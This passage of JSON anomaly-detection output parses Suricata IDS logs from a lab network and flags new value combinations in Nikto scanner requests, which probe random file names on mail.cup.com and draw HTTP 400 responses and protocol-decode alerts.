"/parser/model/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46872, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2191605830972159, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80", "/parser/model/time": 1583349514.2613, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46874, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.render_css", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.261544, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", 
"/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46874, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1200378918664871, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80", "/parser/model/time": 1583349514.263653, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46876, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.*", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.263864, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":486095792505167,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.*\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 
"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46876, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":486095792505167,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 486095792505167, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80", "/parser/model/time": 1583349514.265515, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46878, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.265515 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by 
